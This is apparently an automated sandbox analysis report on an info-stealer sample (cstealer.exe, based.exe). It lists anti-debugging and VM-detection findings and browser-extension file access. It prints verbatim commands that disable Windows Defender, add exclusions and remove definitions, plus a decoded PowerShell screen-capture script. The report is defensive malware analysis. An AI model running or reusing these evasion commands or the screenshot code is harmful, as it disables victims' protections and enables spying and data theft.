                                Source: C:\ProgramData\main.exeThread delayed: delay time: 599094
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 598930
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 598806
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 598693
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 598544
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 598437
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 598317
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 598187
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 598035
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 597906
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 597716
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 597569
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 597453
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 597310
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 597109
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 596890
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 596680
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 596493
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 596344
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 596203
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 596056
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 595927
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 595778
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 595604
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 595216
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 595061
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 594937
                                Source: C:\ProgramData\main.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
                                Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
                                Source: cstealer.exe, 00000002.00000003.2162717973.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2189478645.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: System32\vmGuestLib.dllz
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: System32\vmGuestLib.dll
                                Source: cstealer.exe, 00000009.00000003.2288716798.0000020102D84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx$
                                Source: cstealer.exe, 00000003.00000003.2173753474.00000271D9E73000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2628303853.00000271D9E83000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2495003008.00000271D9E7F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2553076024.00000271D9E82000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2178442107.00000271D9E64000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2550902287.00000271D9E80000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2484503329.00000271D9E7D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2407518867.00000271D9E5D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2443036423.00000271D9E7C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177316384.00000271D9E57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWq
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxmrxnp.dllr
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxmrxnp.dll
                                Source: cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMWARE
                                Source: cstealer.exe, 00000009.00000002.2327444182.0000020102D84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
                                Source: cstealer.exe, 00000009.00000003.2278585948.0000020102D84000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102D84000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219015492.0000020102D84000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102D84000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2214237869.0000020102D75000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102D84000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215808528.0000020102D84000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212719399.0000020102D7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

                                Anti Debugging

                                barindex
                                Hides threads from debuggers
                                Source: C:\ProgramData\svchost.exeThread information set: HideFromDebugger
                                Potentially malicious time measurement code found
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A803572C9_2_00007FF8A803572C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80342419_2_00007FF8A8034241
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A80332F6 rdtsc 9_2_00007FF8A80332F6
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00000271DC677D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00000271DC677D90
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 8_2_00007FF8A8F28610 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,8_2_00007FF8A8F28610
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00000271DC671628 GetProcessHeap,HeapAlloc,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegCloseKey,3_2_00000271DC671628
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                Source: C:\ProgramData\main.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00000271DC677D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00000271DC677D90
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00000271DC67D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00000271DC67D2A4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957EC8BC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF6957EC8BC
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957EC030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF6957EC030
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957ECA9C SetUnhandledExceptionFilter,3_2_00007FF6957ECA9C
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957FB3CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF6957FB3CC
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6E9C030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF6D6E9C030
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6E9C8BC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF6D6E9C8BC
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6EAB3CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF6D6EAB3CC
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 4_2_00007FF6D6E9CA9C SetUnhandledExceptionFilter,4_2_00007FF6D6E9CA9C
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D9217D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00000230D9217D90
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D921D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00000230D921D2A4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E7128D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0000014E7128D2A4
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E71287D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0000014E71287D90
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 8_2_00007FF8BA250338 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF8BA250338
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7EC8000 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF8A7EC8000
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7F12A60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF8A7F12A60
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A7F13028 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FF8A7F13028
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8A8035A1F IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FF8A8035A1F
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8B7E3B360 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF8B7E3B360
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 9_2_00007FF8B7E3B930 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FF8B7E3B930
                                Source: C:\Users\user\Desktop\DevxExecutor.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Adds a directory exclusion to Windows Defender
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'
                                Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                Bypasses PowerShell execution policy
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                Encrypted powershell cmdline option found
                                Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                                Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                                Found direct / indirect Syscall (likely to bypass EDR)
                                Source: C:\ProgramData\setup.exeNtQuerySystemInformation: Direct from: 0x7FF7586842AE
                                Maps a DLL or memory area into another process
                                Source: C:\ProgramData\setup.exeSection loaded: NULL target: unknown protection: readonly
                                Modifies Windows Defender protection settings
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
